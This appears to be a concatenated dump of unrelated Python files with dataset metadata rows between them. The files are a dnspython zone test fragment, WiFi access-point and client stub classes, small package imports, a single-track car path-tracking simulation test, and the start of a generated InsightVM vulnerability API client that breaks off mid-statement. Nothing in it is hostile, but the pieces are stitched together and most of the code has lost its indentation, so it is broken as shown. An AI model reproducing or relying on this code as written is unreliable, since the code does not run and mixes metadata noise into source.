(dns.name.from_text('ns1', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.1')),
(dns.name.from_text('ns2', None),
3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.A,
'10.0.0.2')),
(dns.name.from_text('27.2', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.PTR,
'zlb1.oob')),
(dns.name.from_text('28.2', None), 3600L,
dns.rdata.from_text(dns.rdataclass.IN, dns.rdatatype.PTR,
'zlb2.oob'))]
exl.sort()
self.failUnless(l == exl)
if __name__ == '__main__':
unittest.main()
| 39.652 | 78 | 0.487239 | 2,516 | 19,826 | 3.762719 | 0.082671 | 0.131826 | 0.084821 | 0.115665 | 0.860251 | 0.860251 | 0.853385 | 0.823915 | 0.823915 | 0.816943 | 0 | 0.089838 | 0.379048 | 19,826 | 499 | 79 | 39.731463 | 0.679149 | 0.0402 | 0 | 0.826087 | 0 | 0.011442 | 0.170778 | 0.021091 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.029748 | null | null | 0.004577 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43cc35ddea884281ca97bb7f39e378014484013c | 11,324 | py | Python | boardfarm/lib/wifi_lib/stubs.py | nickberry17/boardfarm | 80f24fc97eff9a987250a6334b76eff08e001189 | [
"BSD-3-Clause-Clear"
] | 17 | 2018-04-19T08:35:47.000Z | 2021-11-01T01:38:33.000Z | boardfarm/lib/wifi_lib/stubs.py | nickberry17/boardfarm | 80f24fc97eff9a987250a6334b76eff08e001189 | [
"BSD-3-Clause-Clear"
] | 190 | 2018-04-19T07:00:18.000Z | 2022-02-11T01:42:51.000Z | boardfarm/lib/wifi_lib/stubs.py | nickberry17/boardfarm | 80f24fc97eff9a987250a6334b76eff08e001189 | [
"BSD-3-Clause-Clear"
] | 30 | 2018-04-12T01:49:21.000Z | 2022-02-11T14:53:19.000Z | class WiFiStub:
"""Wifi_stub."""
apply_changes_no_delay = True
# The above variable can tweak the behavior of the below functions
# If it is set to True, it will apply the changes after setting wifi parameters
# If it is set to False, it will not save any changes & apply_changes() will be skipped
def enable_wifi(self, *args, **kwargs):
"""Stub for enabling wifi on CM.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_ssid(self, *args, **kwargs):
"""Stub to set SSID.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_broadcast(self, *args, **kwargs):
"""Stub to set broadcast.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_security(self, *args, **kwargs):
"""Stub to set security.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_password(self, *args, **kwargs):
"""Stub to set password.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def enable_channel_utilization(self, *args, **kwargs):
"""Stub to enable channel utilization.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_operating_mode(self, *args, **kwargs):
"""Stub to set operating mode.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_bandwidth(self, *args, **kwargs):
"""Stub to set bandwidth.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def set_channel_number(self, *args, **kwargs):
"""Stub to enable channel utilization.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_wifi_enabled(self, *args, **kwargs):
"""Stub to get WiFi enabled.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_ssid(self, *args, **kwargs):
"""Stub to get SSID.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_security(self, *args, **kwargs):
"""Stub to get security mode.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_password(self, *args, **kwargs):
"""Stub to get password.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_channel_utilization(self, *args, **kwargs):
"""Stub to get channel utilization.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_operating_mode(self, *args, **kwargs):
"""Stub to get operating mode.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_bandwidth(self, *args, **kwargs):
"""Stub to get bandwidth.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_broadcast(self, *args, **kwargs):
"""Stub to get the broadcast.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def get_channel_number(self, *args, **kwargs):
"""Stub to get the channel number.
:param self: self object
:type self: object
:param args: arguments to be used if any
:type args: NA
:param kwargs: extra arguments to be used
:type kwargs: NA
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def prepare(self):
"""Stub to prepare.
:param self: self object
:type self: object
"""
pass
def cleanup(self):
"""Stub to cleanup.
:param self: self object
:type self: object
"""
pass
def apply_changes(self):
"""Stub used to save the configs to be modified.
:param self: self object
:type self: object
"""
pass
class WiFiClientStub:
"""Wifi client stub."""
def enable_wifi(self):
"""Wifi client stub used to enable WiFi/ make the WiFi interface UP.
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def disable_wifi(self):
"""Wifi client stub used to enable WiFi/ make the WiFi interface DOWN.
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def disable_and_enable_wifi(self):
"""Wifi client stub used to disable and enable WiFi/.
Make the WiFi interface DOWN and UP
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_scan(self):
"""Wifi client stub used to scan for SSIDs on a particular radio and return a list of SSID.
Note: this code does not execute, but rather serves as an example for
the API
return "SSID: <ssid_name1> SSID: <ssid_name2>.."
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_check_ssid(self, ssid_name):
"""Wifi client stub used to scan for particular SSID.
Note: this code does not execute, but rather serves as an example for
the API
return True if found
return False if not found
:param self: self object
:type self: object
:param ssid_name: ssid name to be scanned for
:type ssid_name: string
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_connect(self, ssid_name, password, security_mode):
"""Wifi client stub used to connect to wifi.
Either with ssid name and password or with ssid name alone.
:param self: self object
:type self: object
:param ssid_name: ssid name to be scanned for
:type ssid_name: string
:param password: password to be used to connect to SSID
:type password: string
:param security_mode: security mode of WiFi
:type security_mode: string
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_connectivity_verify(self):
"""Wifi client stub used to verify wifi connectivity.
Note : this code does not execute, but rather serves as an example for
the API
return True or False
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_disconnect(self):
"""Wifi client stub used to disconnect WiFi.
:param self: self object
:type self: object
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
def wifi_change_region(self, country):
"""Wifi client stub used to change the country.
:param self: self object
:type self: object
:param country: country to change to
:tSype country: string
:raises: Exception "Not implemented"
"""
raise Exception("Not implemented!")
| 29.957672 | 99 | 0.589898 | 1,370 | 11,324 | 4.835037 | 0.084672 | 0.09058 | 0.1875 | 0.092391 | 0.856884 | 0.847524 | 0.79212 | 0.750151 | 0.73279 | 0.711202 | 0 | 0.000262 | 0.324709 | 11,324 | 377 | 100 | 30.037135 | 0.865961 | 0.577888 | 0 | 0.47619 | 0 | 0 | 0.149017 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.47619 | false | 0.095238 | 0 | 0 | 0.52381 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
78d8e8e63e01a6d862e17eb4f9f107afebbc88b6 | 108 | py | Python | PygameFloatObjects/examples/__init__.py | MrComboF10/PygameFloatObjects | e139a3b542d1ef2d54604e2769827c9da6d2cee3 | [
"MIT"
] | null | null | null | PygameFloatObjects/examples/__init__.py | MrComboF10/PygameFloatObjects | e139a3b542d1ef2d54604e2769827c9da6d2cee3 | [
"MIT"
] | null | null | null | PygameFloatObjects/examples/__init__.py | MrComboF10/PygameFloatObjects | e139a3b542d1ef2d54604e2769827c9da6d2cee3 | [
"MIT"
] | null | null | null | from PygameFloatObjects.examples import circle_example
from PygameFloatObjects.examples import rect_example
| 36 | 54 | 0.907407 | 12 | 108 | 8 | 0.583333 | 0.458333 | 0.625 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 108 | 2 | 55 | 54 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
600f08102369b73fc9f0aa06a7ac89c869596b33 | 132 | py | Python | string_demon/__init__.py | guokr/string_demon | f883a334a8105a039c205bed59f6568cf547bf04 | [
"MIT"
] | null | null | null | string_demon/__init__.py | guokr/string_demon | f883a334a8105a039c205bed59f6568cf547bf04 | [
"MIT"
] | null | null | null | string_demon/__init__.py | guokr/string_demon | f883a334a8105a039c205bed59f6568cf547bf04 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from .text import spam_check
from .text import lcs_check
from .text import blacklist_check
| 18.857143 | 33 | 0.780303 | 22 | 132 | 4.545455 | 0.636364 | 0.24 | 0.42 | 0.38 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008772 | 0.136364 | 132 | 6 | 34 | 22 | 0.868421 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
601b7acd7148713beba625ee7a1d5999ef5e4f24 | 13,686 | py | Python | neural_clbf/systems/tests/test_single_track_car.py | saxenam06/neural_clbf | 1f2a43b579330172a03f284a5673b00f0899c755 | [
"BSD-3-Clause"
] | 9 | 2022-01-22T11:47:11.000Z | 2022-03-08T14:49:38.000Z | neural_clbf/systems/tests/test_single_track_car.py | saxenam06/neural_clbf | 1f2a43b579330172a03f284a5673b00f0899c755 | [
"BSD-3-Clause"
] | 1 | 2021-11-14T22:30:20.000Z | 2021-11-19T14:40:49.000Z | neural_clbf/systems/tests/test_single_track_car.py | saxenam06/neural_clbf | 1f2a43b579330172a03f284a5673b00f0899c755 | [
"BSD-3-Clause"
] | 5 | 2022-01-23T17:02:52.000Z | 2022-03-29T22:26:59.000Z | """Test the 2D quadrotor dynamics"""
from copy import copy
import matplotlib.pyplot as plt
import tqdm
import numpy as np
import torch
from neural_clbf.systems import STCar
def test_stcar_init():
"""Test initialization of kinematic car"""
# Test instantiation with valid parameters
valid_params = {
"psi_ref": 1.0,
"v_ref": 1.0,
"a_ref": 0.0,
"omega_ref": 0.0,
}
stcar = STCar(valid_params)
assert stcar is not None
assert stcar.n_dims == 7
assert stcar.n_controls == 2
def plot_stcar_straight_path():
"""Test the dynamics of the kinematic car tracking a straight path"""
# Create the system
params = {
"psi_ref": 0.5,
"v_ref": 10.0,
"a_ref": 0.0,
"omega_ref": 0.0,
}
dt = 0.001
stcar = STCar(params, dt)
upper_u_lim, lower_u_lim = stcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 1.0
n_sims = 1
controller_period = 0.01
num_timesteps = int(t_sim // dt)
start_x = torch.tensor([[0.0, 1.0, 0.0, 1.0, -np.pi / 6, 0.0, 0.0]])
x_sim = torch.zeros(num_timesteps, n_sims, stcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, stcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = stcar.u_nominal(x_current)
for dim_idx in range(stcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = stcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
)
# # check that the dynamics are rotation invariant
# for j in range(10):
# psi_ref_new = params["psi_ref"] + j * np.pi / 10
# test_params = copy(params)
# test_params["psi_ref"] = psi_ref_new
# xdot_test = stcar.closed_loop_dynamics(
# x_current[i, :].unsqueeze(0), u[i, :].unsqueeze(0), test_params
# )
# assert torch.allclose(xdot, xdot_test)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
psi_ref = params["psi_ref"]
x_ref = t * params["v_ref"] * np.cos(psi_ref)
y_ref = t * params["v_ref"] * np.sin(psi_ref)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, stcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, stcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax1.set_ylim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_xlim([-t_sim * params["v_ref"], t_sim * params["v_ref"]])
ax1.set_aspect("equal")
# psi_err_path = x_sim[:, :, stcar.PSI_E].cpu().squeeze().numpy()
# delta_path = x_sim[:, :, stcar.DELTA].cpu().squeeze().numpy()
# v_err_path = x_sim[:, :, stcar.VE].cpu().squeeze().numpy()
# ax1.plot(t[:t_final], y_err_path[:t_final])
# ax1.plot(t[:t_final], x_err_path[:t_final])
# ax1.plot(t[:t_final], psi_err_path[:t_final])
# ax1.plot(t[:t_final], delta_path[:t_final])
# ax1.plot(t[:t_final], v_err_path[:t_final])
# ax1.legend(["y", "x", "psi", "delta", "ve"])
ax2 = axs[1]
plot_u_indices = [stcar.VDELTA, stcar.ALONG]
plot_u_labels = ["$v_\\delta$", "$a_{long}$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, :].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
def plot_stcar_circle_path():
"""Test the dynamics of the kinematic car tracking a circle path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": 10.0,
"a_ref": 0.0,
"omega_ref": 0.5,
}
dt = 0.01
stcar = STCar(params, dt)
upper_u_lim, lower_u_lim = stcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 20.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = torch.tensor([[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]])
x_sim = torch.zeros(num_timesteps, n_sims, stcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, stcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = stcar.u_nominal(x_current)
for dim_idx in range(stcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Get the path parameters at this point
psi_ref[tstep] = dt * params["omega_ref"] + psi_ref[tstep - 1]
pt = copy(params)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = stcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
# Get reference path
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, stcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, stcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax2 = axs[1]
plot_u_indices = [stcar.VDELTA, stcar.ALONG]
plot_u_labels = ["$v_\\delta$", "$a_{long}$"]
for i_trace in range(len(plot_u_indices)):
ax2.plot(
t[1:t_final],
u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
label=plot_u_labels[i_trace],
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, :].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
def plot_stcar_s_path(v_ref: float = 10.0):
"""Test the dynamics of the kinematic car tracking a S path"""
# Create the system
params = {
"psi_ref": 1.0,
"v_ref": v_ref,
"a_ref": 0.0,
"omega_ref": 0.0,
}
dt = 0.01
stcar = STCar(params, dt)
upper_u_lim, lower_u_lim = stcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 10.0
n_sims = 1
controller_period = dt
num_timesteps = int(t_sim // dt)
start_x = torch.tensor([[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]])
x_sim = torch.zeros(num_timesteps, n_sims, stcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, stcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
# And create a place to store the reference path
x_ref = np.zeros(num_timesteps)
y_ref = np.zeros(num_timesteps)
psi_ref = np.zeros(num_timesteps)
psi_ref[0] = 1.0
# Simulate!
pt = copy(params)
for tstep in tqdm.trange(1, num_timesteps):
# Get the path parameters at this point
omega_ref_t = 1.0 * np.sin(tstep * dt) + params["omega_ref"]
psi_ref[tstep] = dt * omega_ref_t + psi_ref[tstep - 1]
pt = copy(pt)
pt["psi_ref"] = psi_ref[tstep]
x_ref[tstep] = x_ref[tstep - 1] + dt * pt["v_ref"] * np.cos(psi_ref[tstep])
y_ref[tstep] = y_ref[tstep - 1] + dt * pt["v_ref"] * np.sin(psi_ref[tstep])
pt["omega_ref"] = omega_ref_t
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = stcar.u_nominal(x_current, pt)
for dim_idx in range(stcar.n_controls):
u[:, dim_idx] = torch.clamp(
u[:, dim_idx],
min=lower_u_lim[dim_idx].item(),
max=upper_u_lim[dim_idx].item(),
)
u_sim[tstep, :, :] = u
else:
u = u_sim[tstep - 1, :, :]
u_sim[tstep, :, :] = u
# Simulate forward using the dynamics
for i in range(n_sims):
xdot = stcar.closed_loop_dynamics(
x_current[i, :].unsqueeze(0),
u[i, :].unsqueeze(0),
pt,
)
x_sim[tstep, i, :] = x_current[i, :] + dt * xdot.squeeze()
t_final = tstep
t = np.linspace(0, t_sim, num_timesteps)
# Convert trajectory from path-centric to world coordinates
x_err_path = x_sim[:, :, stcar.SXE].cpu().squeeze().numpy()
y_err_path = x_sim[:, :, stcar.SYE].cpu().squeeze().numpy()
x_world = x_ref + x_err_path * np.cos(psi_ref) - y_err_path * np.sin(psi_ref)
y_world = y_ref + x_err_path * np.sin(psi_ref) + y_err_path * np.cos(psi_ref)
fig, axs = plt.subplots(3, 1)
fig.set_size_inches(10, 12)
ax1 = axs[0]
ax1.plot(
x_world[:t_final],
y_world[:t_final],
linestyle="-",
label="Tracking",
)
ax1.plot(
x_ref[:t_final],
y_ref[:t_final],
linestyle=":",
label="Reference",
)
ax1.set_xlabel("$x$")
ax1.set_ylabel("$y$")
ax1.legend()
ax2 = axs[1]
# plot_u_indices = [stcar.VDELTA, stcar.ALONG]
# plot_u_labels = ["$v_\\delta$", "$a_{long}$"]
# for i_trace in range(len(plot_u_indices)):
# ax2.plot(
# t[1:t_final],
# u_sim[1:t_final, :, plot_u_indices[i_trace]].cpu(),
# label=plot_u_labels[i_trace],
# )
ax2.plot(
t[:t_final],
x_sim[:t_final, :, stcar.BETA].cpu().squeeze().numpy(),
label="beta",
)
ax2.legend()
ax3 = axs[2]
ax3.plot(
t[:t_final],
x_sim[:t_final, :, :].norm(dim=-1).squeeze().numpy(),
label="Tracking Error",
)
ax3.legend()
ax3.set_xlabel("$t$")
plt.show()
# Return the maximum tracking error
tracking_error = x_sim[
:,
:,
[
STCar.SXE,
STCar.SYE,
STCar.VE,
STCar.PSI_E,
],
]
return tracking_error[:t_final, :, :].norm(dim=-1).squeeze().max()
if __name__ == "__main__":
# plot_stcar_straight_path()
# plot_stcar_circle_path()
plot_stcar_s_path()
# max_tracking_error = []
# v_refs = np.linspace(5.0, 100.0, 10)
# for v_ref in v_refs:
# max_tracking_error.append(plot_stcar_s_path(v_ref))
# plt.plot(v_refs, max_tracking_error, linestyle=":", marker="x")
# plt.xlabel("Reference velocity (m/s)")
# plt.ylabel("Max tracking error")
# plt.title("LQR controller with single-track model")
# plt.show()
| 31.680556 | 85 | 0.559404 | 2,032 | 13,686 | 3.510335 | 0.098917 | 0.033646 | 0.011356 | 0.012898 | 0.834572 | 0.817889 | 0.79742 | 0.781859 | 0.766578 | 0.747091 | 0 | 0.025212 | 0.292854 | 13,686 | 431 | 86 | 31.75406 | 0.711821 | 0.20225 | 0 | 0.760656 | 0 | 0 | 0.035754 | 0 | 0 | 0 | 0 | 0 | 0.009836 | 1 | 0.013115 | false | 0 | 0.019672 | 0 | 0.036066 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
607077d0d8b2dfa52517551cd7612f50d5da9a22 | 104,046 | py | Python | rapid7vmconsole/api/vulnerability_api.py | kiblik/vm-console-client-python | 038f6d33e8b2654a558326c6eb87f09ee23e0e22 | [
"MIT"
] | 61 | 2018-05-17T05:57:09.000Z | 2022-03-08T13:59:21.000Z | rapid7vmconsole/api/vulnerability_api.py | kiblik/vm-console-client-python | 038f6d33e8b2654a558326c6eb87f09ee23e0e22 | [
"MIT"
] | 33 | 2018-06-26T16:21:14.000Z | 2022-03-03T20:55:47.000Z | rapid7vmconsole/api/vulnerability_api.py | kiblik/vm-console-client-python | 038f6d33e8b2654a558326c6eb87f09ee23e0e22 | [
"MIT"
] | 43 | 2018-02-24T05:45:53.000Z | 2022-03-31T22:15:16.000Z | # coding: utf-8
"""
Python InsightVM API Client
OpenAPI spec version: 3
Contact: support@rapid7.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from rapid7vmconsole.api_client import ApiClient
class VulnerabilityApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_affected_assets(self, id, **kwargs): # noqa: E501
"""Vulnerability Affected Assets # noqa: E501
Get the assets affected by the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_affected_assets(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithAssetIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_affected_assets_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_affected_assets_with_http_info(id, **kwargs) # noqa: E501
return data
def get_affected_assets_with_http_info(self, id, **kwargs): # noqa: E501
"""Vulnerability Affected Assets # noqa: E501
Get the assets affected by the vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_affected_assets_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the vulnerability. (required)
:return: ReferencesWithAssetIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_affected_assets" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_affected_assets`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
